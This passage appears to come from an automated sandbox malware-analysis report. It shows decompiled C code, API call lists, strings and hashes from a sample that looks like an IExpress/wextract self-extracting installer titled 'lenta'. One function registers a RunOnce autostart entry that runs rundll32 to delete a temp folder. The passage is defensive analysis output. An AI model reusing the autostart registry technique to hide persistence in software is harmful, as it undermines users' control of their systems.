                                                                        					EndDialog(_a4, _a12);
                                                                        					return 1;
                                                                        				}
                                                                        				return 0;
                                                                        			}













                                                                        APIs
                                                                        • TerminateThread.KERNEL32(00000000), ref: 003D3535
                                                                        • EndDialog.USER32(?,?), ref: 003D3541
                                                                        • ResetEvent.KERNEL32 ref: 003D355F
                                                                        • SetEvent.KERNEL32(003D1140,00000000,00000020,00000004), ref: 003D3590
                                                                        • GetDesktopWindow.USER32 ref: 003D35C7
                                                                        • GetDlgItem.USER32(?,0000083B), ref: 003D35F1
                                                                        • SendMessageA.USER32(00000000), ref: 003D35F8
                                                                        • GetDlgItem.USER32(?,0000083B), ref: 003D3610
                                                                        • SendMessageA.USER32(00000000), ref: 003D3617
                                                                        • SetWindowTextA.USER32(?,lenta), ref: 003D3623
                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_00004FE0,00000000,00000000,003D8798), ref: 003D3637
                                                                        • EndDialog.USER32(?,00000000), ref: 003D3671
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                        • String ID: lenta
                                                                        • API String ID: 2406144884-2780258678
                                                                        • Opcode ID: 729507870c774de10f3d4bb8b8b5a292d27009038198234df9755c945e4a7937
                                                                        • Instruction ID: 4b19dcd94946a70184165d8f138d5c0a81dd302e0a7e336c21b707680fa907e2
                                                                        • Opcode Fuzzy Hash: 729507870c774de10f3d4bb8b8b5a292d27009038198234df9755c945e4a7937
                                                                        • Instruction Fuzzy Hash: DC31A072241201BBD7231F25FD8DE2A3B7DE786B01F14492BF602957A0CB71DE10DA56
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 50%
                                                                        			E003D4224(char __ecx) {
                                                                        				char* _v8;
                                                                        				_Unknown_base(*)()* _v12;
                                                                        				_Unknown_base(*)()* _v16;
                                                                        				_Unknown_base(*)()* _v20;
                                                                        				char* _v28;
                                                                        				intOrPtr _v32;
                                                                        				intOrPtr _v36;
                                                                        				intOrPtr _v40;
                                                                        				char _v44;
                                                                        				char _v48;
                                                                        				char _v52;
                                                                        				_Unknown_base(*)()* _t26;
                                                                        				_Unknown_base(*)()* _t28;
                                                                        				_Unknown_base(*)()* _t29;
                                                                        				_Unknown_base(*)()* _t32;
                                                                        				char _t42;
                                                                        				char* _t44;
                                                                        				char* _t61;
                                                                        				void* _t63;
                                                                        				char* _t65;
                                                                        				struct HINSTANCE__* _t66;
                                                                        				char _t67;
                                                                        				void* _t71;
                                                                        				char _t76;
                                                                        				intOrPtr _t85;
                                                                        
                                                                        				_t67 = __ecx;
                                                                        				_t66 = LoadLibraryA("SHELL32.DLL");
                                                                        				if(_t66 == 0) {
                                                                        					_t63 = 0x4c2;
                                                                        					L22:
                                                                        					E003D44B9(_t67, _t63, 0, 0, 0x10, 0);
                                                                        					return 0;
                                                                        				}
                                                                        				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                                        				_v12 = _t26;
                                                                        				if(_t26 == 0) {
                                                                        					L20:
                                                                        					FreeLibrary(_t66);
                                                                        					_t63 = 0x4c1;
                                                                        					goto L22;
                                                                        				}
                                                                        				_t28 = GetProcAddress(_t66, 0xc3);
                                                                        				_v20 = _t28;
                                                                        				if(_t28 == 0) {
                                                                        					goto L20;
                                                                        				}
                                                                        				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                                        				_v16 = _t29;
                                                                        				if(_t29 == 0) {
                                                                        					goto L20;
                                                                        				}
                                                                        				_t76 =  *0x3d88c0; // 0x0
                                                                        				if(_t76 != 0) {
                                                                        					L10:
                                                                        					 *0x3d87a0 = 0;
                                                                        					_v52 = _t67;
                                                                        					_v48 = 0;
                                                                        					_v44 = 0;
                                                                        					_v40 = 0x3d8598;
                                                                        					_v36 = 1;
                                                                        					_v32 = E003D4200;
                                                                        					_v28 = 0x3d88c0;
                                                                        					 *0x3da288( &_v52);
                                                                        					_t32 =  *_v12();
                                                                        					if(_t71 != _t71) {
                                                                        						asm("int 0x29");
                                                                        					}
                                                                        					_v12 = _t32;
                                                                        					if(_t32 != 0) {
                                                                        						 *0x3da288(_t32, 0x3d88c0);
                                                                        						 *_v16();
                                                                        						if(_t71 != _t71) {
                                                                        							asm("int 0x29");
                                                                        						}
                                                                        						if( *0x3d88c0 != 0) {
                                                                        							E003D1680(0x3d87a0, 0x104, 0x3d88c0);
                                                                        						}
                                                                        						 *0x3da288(_v12);
                                                                        						 *_v20();
                                                                        						if(_t71 != _t71) {
                                                                        							asm("int 0x29");
                                                                        						}
                                                                        					}
                                                                        					FreeLibrary(_t66);
                                                                        					_t85 =  *0x3d87a0; // 0x0
                                                                        					return 0 | _t85 != 0x00000000;
                                                                        				} else {
                                                                        					GetTempPathA(0x104, 0x3d88c0);
                                                                        					_t61 = 0x3d88c0;
                                                                        					_t4 =  &(_t61[1]); // 0x3d88c1
                                                                        					_t65 = _t4;
                                                                        					do {
                                                                        						_t42 =  *_t61;
                                                                        						_t61 =  &(_t61[1]);
                                                                        					} while (_t42 != 0);
                                                                        					_t5 = _t61 - _t65 + 0x3d88c0; // 0x7b1181
                                                                        					_t44 = CharPrevA(0x3d88c0, _t5);
                                                                        					_v8 = _t44;
                                                                        					if( *_t44 == 0x5c &&  *(CharPrevA(0x3d88c0, _t44)) != 0x3a) {
                                                                        						 *_v8 = 0;
                                                                        					}
                                                                        					goto L10;
                                                                        				}
                                                                        			}





























                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 003D4236
                                                                        • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 003D424C
                                                                        • GetProcAddress.KERNEL32(00000000,000000C3), ref: 003D4263
                                                                        • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 003D427A
                                                                        • GetTempPathA.KERNEL32(00000104,003D88C0,?,00000001), ref: 003D429F
                                                                        • CharPrevA.USER32(003D88C0,007B1181,?,00000001), ref: 003D42C2
                                                                        • CharPrevA.USER32(003D88C0,00000000,?,00000001), ref: 003D42D6
                                                                        • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 003D4391
                                                                        • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 003D43A5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                        • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                        • API String ID: 1865808269-1731843650
                                                                        • Opcode ID: 23efcdcf88b83e0904a6ca27401bd9669fc86b64e3cd33e411d39197f545d299
                                                                        • Instruction ID: 2ce8ab5fe1b8a5c663468908cf23578ed7a39495bd1ffb72f46aa81629a44e12
                                                                        • Opcode Fuzzy Hash: 23efcdcf88b83e0904a6ca27401bd9669fc86b64e3cd33e411d39197f545d299
                                                                        • Instruction Fuzzy Hash: 744123BAA01240AFD713AF74FC88AAE7BB8EB49344F05046BF901A3391CB749C01C761
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E003D44B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                        				signed int _v8;
                                                                        				char _v64;
                                                                        				char _v576;
                                                                        				void* _v580;
                                                                        				struct HWND__* _v584;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t34;
                                                                        				void* _t37;
                                                                        				signed int _t39;
                                                                        				intOrPtr _t43;
                                                                        				signed int _t44;
                                                                        				signed int _t49;
                                                                        				signed int _t52;
                                                                        				void* _t54;
                                                                        				intOrPtr _t55;
                                                                        				intOrPtr _t58;
                                                                        				intOrPtr _t59;
                                                                        				int _t64;
                                                                        				void* _t66;
                                                                        				intOrPtr* _t67;
                                                                        				signed int _t69;
                                                                        				intOrPtr* _t73;
                                                                        				intOrPtr* _t76;
                                                                        				intOrPtr* _t77;
                                                                        				void* _t80;
                                                                        				void* _t81;
                                                                        				void* _t82;
                                                                        				intOrPtr* _t84;
                                                                        				void* _t85;
                                                                        				signed int _t89;
                                                                        
                                                                        				_t75 = __edx;
                                                                        				_t34 =  *0x3d8004; // 0xf4fc83b5
                                                                        				_v8 = _t34 ^ _t89;
                                                                        				_v584 = __ecx;
                                                                        				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                        				_t67 = _a4;
                                                                        				_t69 = 0xd;
                                                                        				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                        				_t80 = _t83 + _t69 + _t69;
                                                                        				_v580 = _t37;
                                                                        				asm("movsb");
                                                                        				if(( *0x3d8a38 & 0x00000001) != 0) {
                                                                        					_t39 = 1;
                                                                        				} else {
                                                                        					_v576 = 0;
                                                                        					LoadStringA( *0x3d9a3c, _t75,  &_v576, 0x200);
                                                                        					if(_v576 != 0) {
                                                                        						_t73 =  &_v576;
                                                                        						_t16 = _t73 + 1; // 0x1
                                                                        						_t75 = _t16;
                                                                        						do {
                                                                        							_t43 =  *_t73;
                                                                        							_t73 = _t73 + 1;
                                                                        						} while (_t43 != 0);
                                                                        						_t84 = _v580;
                                                                        						_t74 = _t73 - _t75;
                                                                        						if(_t84 == 0) {
                                                                        							if(_t67 == 0) {
                                                                        								_t27 = _t74 + 1; // 0x2
                                                                        								_t83 = _t27;
                                                                        								_t44 = LocalAlloc(0x40, _t83);
                                                                        								_t80 = _t44;
                                                                        								if(_t80 == 0) {
                                                                        									goto L6;
                                                                        								} else {
                                                                        									_t75 = _t83;
                                                                        									_t74 = _t80;
                                                                        									E003D1680(_t80, _t83,  &_v576);
                                                                        									goto L23;
                                                                        								}
                                                                        							} else {
                                                                        								_t76 = _t67;
                                                                        								_t24 = _t76 + 1; // 0x1
                                                                        								_t85 = _t24;
                                                                        								do {
                                                                        									_t55 =  *_t76;
                                                                        									_t76 = _t76 + 1;
                                                                        								} while (_t55 != 0);
                                                                        								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                        								_t83 = _t25 + _t74;
                                                                        								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                        								_t80 = _t44;
                                                                        								if(_t80 == 0) {
                                                                        									goto L6;
                                                                        								} else {
                                                                        									E003D171E(_t80, _t83,  &_v576, _t67);
                                                                        									goto L23;
                                                                        								}
                                                                        							}
                                                                        						} else {
                                                                        							_t77 = _t67;
                                                                        							_t18 = _t77 + 1; // 0x1
                                                                        							_t81 = _t18;
                                                                        							do {
                                                                        								_t58 =  *_t77;
                                                                        								_t77 = _t77 + 1;
                                                                        							} while (_t58 != 0);
                                                                        							_t75 = _t77 - _t81;
                                                                        							_t82 = _t84 + 1;
                                                                        							do {
                                                                        								_t59 =  *_t84;
                                                                        								_t84 = _t84 + 1;
                                                                        							} while (_t59 != 0);
                                                                        							_t21 = _t74 + 0x64; // 0x65
                                                                        							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                        							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                        							_t80 = _t44;
                                                                        							if(_t80 == 0) {
                                                                        								goto L6;
                                                                        							} else {
                                                                        								_push(_v580);
                                                                        								E003D171E(_t80, _t83,  &_v576, _t67);
                                                                        								L23:
                                                                        								MessageBeep(_a12);
                                                                        								if(E003D681F(_t67) == 0) {
                                                                        									L25:
                                                                        									_t49 = 0x10000;
                                                                        								} else {
                                                                        									_t54 = E003D67C9(_t74, _t74);
                                                                        									_t49 = 0x190000;
                                                                        									if(_t54 == 0) {
                                                                        										goto L25;
                                                                        									}
                                                                        								}
                                                                        								_t52 = MessageBoxA(_v584, _t80, "lenta", _t49 | _a12 | _a16);
                                                                        								_t83 = _t52;
                                                                        								LocalFree(_t80);
                                                                        								_t39 = _t52;
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						if(E003D681F(_t67) == 0) {
                                                                        							L4:
                                                                        							_t64 = 0x10010;
                                                                        						} else {
                                                                        							_t66 = E003D67C9(0, 0);
                                                                        							_t64 = 0x190010;
                                                                        							if(_t66 == 0) {
                                                                        								goto L4;
                                                                        							}
                                                                        						}
                                                                        						_t44 = MessageBoxA(_v584,  &_v64, "lenta", _t64);
                                                                        						L6:
                                                                        						_t39 = _t44 | 0xffffffff;
                                                                        					}
                                                                        				}
                                                                        				return E003D6CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                                        			}



































                                                                        0x003d459b
                                                                        0x003d459e
                                                                        0x003d45a3
                                                                        0x003d45a9
                                                                        0x003d45ad
                                                                        0x00000000
                                                                        0x003d45af
                                                                        0x003d45af
                                                                        0x003d45bf
                                                                        0x003d462d
                                                                        0x003d4630
                                                                        0x003d463d
                                                                        0x003d464e
                                                                        0x003d464e
                                                                        0x003d463f
                                                                        0x003d4640
                                                                        0x003d4647
                                                                        0x003d464c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d464c
                                                                        0x003d4666
                                                                        0x003d466d
                                                                        0x003d466f
                                                                        0x003d4675
                                                                        0x003d4675
                                                                        0x003d45ad
                                                                        0x003d4527
                                                                        0x003d452e
                                                                        0x003d453f
                                                                        0x003d453f
                                                                        0x003d4530
                                                                        0x003d4531
                                                                        0x003d4538
                                                                        0x003d453d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d453d
                                                                        0x003d4554
                                                                        0x003d455a
                                                                        0x003d455a
                                                                        0x003d455a
                                                                        0x003d4525
                                                                        0x003d468c

                                                                        APIs
                                                                        • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 003D4518
                                                                        • MessageBoxA.USER32(?,?,lenta,00010010), ref: 003D4554
                                                                        • LocalAlloc.KERNEL32(00000040,00000065), ref: 003D45A3
                                                                        • LocalAlloc.KERNEL32(00000040,00000065), ref: 003D45E3
                                                                        • LocalAlloc.KERNEL32(00000040,00000002), ref: 003D460D
                                                                        • MessageBeep.USER32(00000000), ref: 003D4630
                                                                        • MessageBoxA.USER32(?,00000000,lenta,00000000), ref: 003D4666
                                                                        • LocalFree.KERNEL32(00000000), ref: 003D466F
                                                                          • Part of subcall function 003D681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 003D686E
                                                                          • Part of subcall function 003D681F: GetSystemMetrics.USER32(0000004A), ref: 003D68A7
                                                                          • Part of subcall function 003D681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 003D68CC
                                                                          • Part of subcall function 003D681F: RegQueryValueExA.ADVAPI32(?,003D1140,00000000,?,?,0000000C), ref: 003D68F4
                                                                          • Part of subcall function 003D681F: RegCloseKey.ADVAPI32(?), ref: 003D6902
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                        • String ID: LoadString() Error. Could not load string resource.$lenta
                                                                        • API String ID: 3244514340-1000497449
                                                                        • Opcode ID: ac47aef7205366a8e48f69486f08c656c63a9967753a3ab2aea418c0cc9a481f
                                                                        • Instruction ID: 67ddba45d963f3427e20152441e7f7576a06100a3c98b539e1f8aea6f374085d
                                                                        • Opcode Fuzzy Hash: ac47aef7205366a8e48f69486f08c656c63a9967753a3ab2aea418c0cc9a481f
                                                                        • Instruction Fuzzy Hash: 7351D073901219ABDB239F28FD48BAA7B69EF46300F014196FD19A7341DB31DE098B60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E003D2773(CHAR* __ecx, char* _a4) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				char _v269;
                                                                        				CHAR* _v276;
                                                                        				int _v280;
                                                                        				void* _v284;
                                                                        				int _v288;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t23;
                                                                        				intOrPtr _t34;
                                                                        				int _t45;
                                                                        				int* _t50;
                                                                        				CHAR* _t52;
                                                                        				CHAR* _t61;
                                                                        				char* _t62;
                                                                        				int _t63;
                                                                        				CHAR* _t64;
                                                                        				signed int _t65;
                                                                        
                                                                        				_t52 = __ecx;
                                                                        				_t23 =  *0x3d8004; // 0xf4fc83b5
                                                                        				_v8 = _t23 ^ _t65;
                                                                        				_t62 = _a4;
                                                                        				_t50 = 0;
                                                                        				_t61 = __ecx;
                                                                        				_v276 = _t62;
                                                                        				 *((char*)(__ecx)) = 0;
                                                                        				if( *_t62 != 0x23) {
                                                                        					_t63 = 0x104;
                                                                        					goto L14;
                                                                        				} else {
                                                                        					_t64 = _t62 + 1;
                                                                        					_v269 = CharUpperA( *_t64);
                                                                        					_v276 = CharNextA(CharNextA(_t64));
                                                                        					_t63 = 0x104;
                                                                        					_t34 = _v269;
                                                                        					if(_t34 == 0x53) {
                                                                        						L14:
                                                                        						GetSystemDirectoryA(_t61, _t63);
                                                                        						goto L15;
                                                                        					} else {
                                                                        						if(_t34 == 0x57) {
                                                                        							GetWindowsDirectoryA(_t61, 0x104);
                                                                        							goto L16;
                                                                        						} else {
                                                                        							_push(_t52);
                                                                        							_v288 = 0x104;
                                                                        							E003D1781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                        							_t59 = 0x104;
                                                                        							E003D658A( &_v268, 0x104, _v276);
                                                                        							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                                        								L16:
                                                                        								_t59 = _t63;
                                                                        								E003D658A(_t61, _t63, _v276);
                                                                        							} else {
                                                                        								if(RegQueryValueExA(_v284, 0x3d1140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                                        									_t45 = _v280;
                                                                        									if(_t45 != 2) {
                                                                        										L9:
                                                                        										if(_t45 == 1) {
                                                                        											goto L10;
                                                                        										}
                                                                        									} else {
                                                                        										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                                        											_t45 = _v280;
                                                                        											goto L9;
                                                                        										} else {
                                                                        											_t59 = 0x104;
                                                                        											E003D1680(_t61, 0x104,  &_v268);
                                                                        											L10:
                                                                        											_t50 = 1;
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        								RegCloseKey(_v284);
                                                                        								L15:
                                                                        								if(_t50 == 0) {
                                                                        									goto L16;
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return E003D6CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                                        			}


                                                                        APIs
                                                                        • CharUpperA.USER32(F4FC83B5,00000000,00000000,00000000), ref: 003D27A8
                                                                        • CharNextA.USER32(0000054D), ref: 003D27B5
                                                                        • CharNextA.USER32(00000000), ref: 003D27BC
                                                                        • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 003D2829
                                                                        • RegQueryValueExA.ADVAPI32(?,003D1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 003D2852
                                                                        • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 003D2870
                                                                        • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 003D28A0
                                                                        • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 003D28AA
                                                                        • GetSystemDirectoryA.KERNEL32 ref: 003D28B9
                                                                        Strings
                                                                        • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 003D27E4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                        • API String ID: 2659952014-2428544900
                                                                        • Opcode ID: 1fb932c5708d389cb9eac9e054d7a1e3a7e460b3e4c14c19521174fd48d965da
                                                                        • Instruction ID: 7d3a75b57a0dbffbba9bde8daacdaf44b43b7297c5fe4202e7e16d8ec0e4c2f5
                                                                        • Opcode Fuzzy Hash: 1fb932c5708d389cb9eac9e054d7a1e3a7e460b3e4c14c19521174fd48d965da
                                                                        • Instruction Fuzzy Hash: 4B4184B290012CAFDB269B64FC45AEA77BDEB65700F0040A7F545D2210DB708E859FA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 62%
                                                                        			E003D2267() {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				char _v836;
                                                                        				void* _v840;
                                                                        				int _v844;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t19;
                                                                        				intOrPtr _t33;
                                                                        				void* _t38;
                                                                        				intOrPtr* _t42;
                                                                        				void* _t45;
                                                                        				void* _t47;
                                                                        				void* _t49;
                                                                        				signed int _t51;
                                                                        
                                                                        				_t19 =  *0x3d8004; // 0xf4fc83b5
                                                                        				_t20 = _t19 ^ _t51;
                                                                        				_v8 = _t19 ^ _t51;
                                                                        				if( *0x3d8530 != 0) {
                                                                        					_push(_t49);
                                                                        					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                        						_push(_t38);
                                                                        						_v844 = 0x238;
                                                                        						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                        							_push(_t47);
                                                                        							memset( &_v268, 0, 0x104);
                                                                        							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                        								E003D658A( &_v268, 0x104, 0x3d1140);
                                                                        							}
                                                                        							_push("C:\Users\FRONTD~1\AppData\Local\Temp\IXP000.TMP\");
                                                                        							E003D171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                        							_t42 =  &_v836;
                                                                        							_t45 = _t42 + 1;
                                                                        							_pop(_t47);
                                                                        							do {
                                                                        								_t33 =  *_t42;
                                                                        								_t42 = _t42 + 1;
                                                                        							} while (_t33 != 0);
                                                                        							RegSetValueExA(_v840, "wextract_cleanup0", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                        						}
                                                                        						_t20 = RegCloseKey(_v840);
                                                                        						_pop(_t38);
                                                                        					}
                                                                        					_pop(_t49);
                                                                        				}
                                                                        				return E003D6CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                        			}




















                                                                        APIs
                                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 003D22A3
                                                                        • RegQueryValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000000,?,?,00000001), ref: 003D22D8
                                                                        • memset.MSVCRT ref: 003D22F5
                                                                        • GetSystemDirectoryA.KERNEL32 ref: 003D2305
                                                                        • RegSetValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 003D236E
                                                                        • RegCloseKey.ADVAPI32(?), ref: 003D237A
                                                                        Strings
                                                                        • C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\, xrefs: 003D2321
                                                                        • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 003D2299
                                                                        • wextract_cleanup0, xrefs: 003D227C, 003D22CD, 003D2363
                                                                        • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 003D232D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
                                                                        • API String ID: 3027380567-4285006626
                                                                        • Opcode ID: 9b14ef8ac92588a4f00c8dbf0c8f4ef6a429239637c9bdd2f17ae19ab98a7b00
                                                                        • Instruction ID: 83c1af30d6a5c2cb843efcff5dd9204c4a4680f7c91563ab263c0e7a4f685369
                                                                        • Opcode Fuzzy Hash: 9b14ef8ac92588a4f00c8dbf0c8f4ef6a429239637c9bdd2f17ae19ab98a7b00
                                                                        • Instruction Fuzzy Hash: C1319876A012186BDB239B65FC49FDB777CEF55700F0001A7F50DAA151EA71AB88CA50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 87%
                                                                        			E003D3100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                        				void* _t8;
                                                                        				void* _t11;
                                                                        				void* _t15;
                                                                        				struct HWND__* _t16;
                                                                        				struct HWND__* _t33;
                                                                        				struct HWND__* _t34;
                                                                        
                                                                        				_t8 = _a8 - 0xf;
                                                                        				if(_t8 == 0) {
                                                                        					if( *0x3d8590 == 0) {
                                                                        						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                        						 *0x3d8590 = 1;
                                                                        					}
                                                                        					L13:
                                                                        					return 0;
                                                                        				}
                                                                        				_t11 = _t8 - 1;
                                                                        				if(_t11 == 0) {
                                                                        					L7:
                                                                        					_push(0);
                                                                        					L8:
                                                                        					EndDialog(_a4, ??);
                                                                        					L9:
                                                                        					return 1;
                                                                        				}
                                                                        				_t15 = _t11 - 0x100;
                                                                        				if(_t15 == 0) {
                                                                        					_t16 = GetDesktopWindow();
                                                                        					_t33 = _a4;
                                                                        					E003D43D0(_t33, _t16);
                                                                        					SetDlgItemTextA(_t33, 0x834,  *0x3d8d4c);
                                                                        					SetWindowTextA(_t33, "lenta");
                                                                        					SetForegroundWindow(_t33);
                                                                        					_t34 = GetDlgItem(_t33, 0x834);
                                                                        					 *0x3d88b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                        					SetWindowLongA(_t34, 0xfffffffc, E003D30C0);
                                                                        					return 1;
                                                                        				}
                                                                        				if(_t15 != 1) {
                                                                        					goto L13;
                                                                        				}
                                                                        				if(_a12 != 6) {
                                                                        					if(_a12 != 7) {
                                                                        						goto L9;
                                                                        					}
                                                                        					goto L7;
                                                                        				}
                                                                        				_push(1);
                                                                        				goto L8;
                                                                        			}










                                                                        APIs
                                                                        • EndDialog.USER32(?,00000000), ref: 003D313B
                                                                        • GetDesktopWindow.USER32 ref: 003D314B
